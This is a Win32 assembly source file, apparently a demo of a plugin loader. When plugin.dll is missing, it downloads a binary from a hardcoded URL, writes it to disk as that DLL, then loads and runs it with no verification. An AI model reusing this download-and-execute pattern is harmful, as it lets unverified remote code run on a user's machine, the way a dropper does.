;
; down.asm
; Bumblebee <bbbee@mailcity.com>
;
; Description:
;
;  Tries to load a plugin. If not available tries to download it from
;  a web site. Uses wininet.dll.
;
;
.486p
locals
.model flat,STDCALL

        extrn           ExitProcess:PROC
        extrn          LoadLibraryA:PROC
        extrn        GetProcAddress:PROC
        extrn           FreeLibrary:PROC
        extrn           CreateFileA:PROC
        extrn             WriteFile:PROC
        extrn           CloseHandle:PROC

include ../inc/plugin.inc

.DATA

; plugin name to load
plugindll       db      'plugin.dll',0

; following data is needed EVER
plugitstr       db      'PlugIt',0              ; get PlugIt API
dllHnd          dd      ?                       ; handle for the DLL
pluginInfo      PluginObject <?>                ; buff to store plugin info

; download stuff
wininetdll      db      'wininet.dll',0
iopenastr       db      'InternetOpenA',0
iopenurlastr    db      'InternetOpenUrlA',0
ireadfile       db      'InternetReadFile',0
iclosehandle    db      'InternetCloseHandle',0
inetfuncz       dd      offset iopenastr,offset iopenurlastr
                dd      offset ireadfile, offset iclosehandle
inetfuncaddr:
InternetOpenA   dd      0
InternetOpenUrlA dd     0
InternetReadFile dd     0
InternetCloseHandle dd  0

wininethnd      dd      0
openhnd         dd      0
urlhnd          dd      0

url             db      "http://www.plugin.com/plugin.bin",0

bytesread       dd      0
buffer          dd      5*1024 dup (0)

.CODE
inicio:
        push    offset plugindll                ; load the DLL
        call    LoadLibraryA
        or      eax,eax
        jz      pluginNotLoaded
        mov     [dllHnd],eax

        push    offset plugitstr                ; get PlugIt api
        push    eax
        call    GetProcAddress
        or      eax,eax
        jz      pluginNotLoadedFreeDLL

        push    offset pluginInfo               ; get plugin info
        call    eax
                                                ; check it's app
        cmp     pluginInfo.po_provides,PROVIDE_APP
        jne     pluginNotLoadedFreeDLL

        mov     eax,pluginInfo.po_api           ; exec api
        call    eax

pluginNotLoadedFreeDLL:
        push    [dllHnd]
        call    FreeLibrary

        push    0h
        call    ExitProcess                     ; done!

                                                ; if failed to load
pluginNotLoaded:                                ; try to download it

        cmp     [wininethnd],0                  ; already downloaded?
        jne     winetFuncNotFound

        push    offset wininetdll               ; load library
        call    LoadLibraryA
        or      eax,eax
        jz      wininetNotLoaded
        mov     dword ptr [wininethnd],eax

        lea     esi,inetfuncz                   ; get apis
        lea     edi,inetfuncaddr
        mov     ecx,4
GetFuncLoop:
        mov     edx,dword ptr [esi]
        push    esi edi ecx
        push    edx
        push    dword ptr [wininethnd]
        call    GetProcAddress
        or      eax,eax
        pop     ecx edi esi
        jz      winetFuncNotFound
        mov     dword ptr [edi],eax
        add     esi,4
        add     edi,4
        loop    GetFuncLoop

        xor     eax,eax                         ; open connection
        push    eax
        push    eax
        push    eax
        push    eax
        call    dword ptr [InternetOpenA]
        or      eax,eax
        jz      winetFuncNotFound

        mov     [openhnd],eax                   ; open url
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    eax
        push    offset url
        push    [openhnd]
        call    dword ptr [InternetOpenUrlA]
        or      eax,eax
        jz      closeinetopen

        mov     [urlhnd],eax

        xor     eax,eax                         ; get plugin (4kbs)
        push    eax
        push    offset bytesread
        push    4*1024
        push    offset buffer
        push    [urlhnd]
        call    dword ptr [InternetReadFile]
        cmp     [bytesread],4*1024              ; check it's ok
        jne     closeinetopenurl

        push    [urlhnd]
        call    dword ptr [InternetCloseHandle]

        push    [openhnd]        
        call    dword ptr [InternetCloseHandle]

                                                ; now dump it to disk
        xor     eax,eax
        push    eax
        push    00000080h
        push    00000001h
        push    eax
        push    eax
        push    40000000h
        push    offset plugindll
        call    CreateFileA
        inc     eax
        jz      winetFuncNotFound
        dec     eax

        push    eax
        push    0
        push    offset bytesread
        push    4*1024
        push    offset buffer
        push    eax
        call    WriteFile
        pop     eax

        push    eax
        call    CloseHandle
                                                ; now try to load the
        jmp     inicio                          ; plugin again

closeinetopenurl:
        push    [urlhnd]
        call    dword ptr [InternetCloseHandle]

closeinetopen:
        push    [openhnd]        
        call    dword ptr [InternetCloseHandle]

winetFuncNotFound:
        push    dword ptr [wininethnd]
        call    FreeLibrary

wininetNotLoaded:
        push    0h
        call    ExitProcess

Ends
End     inicio


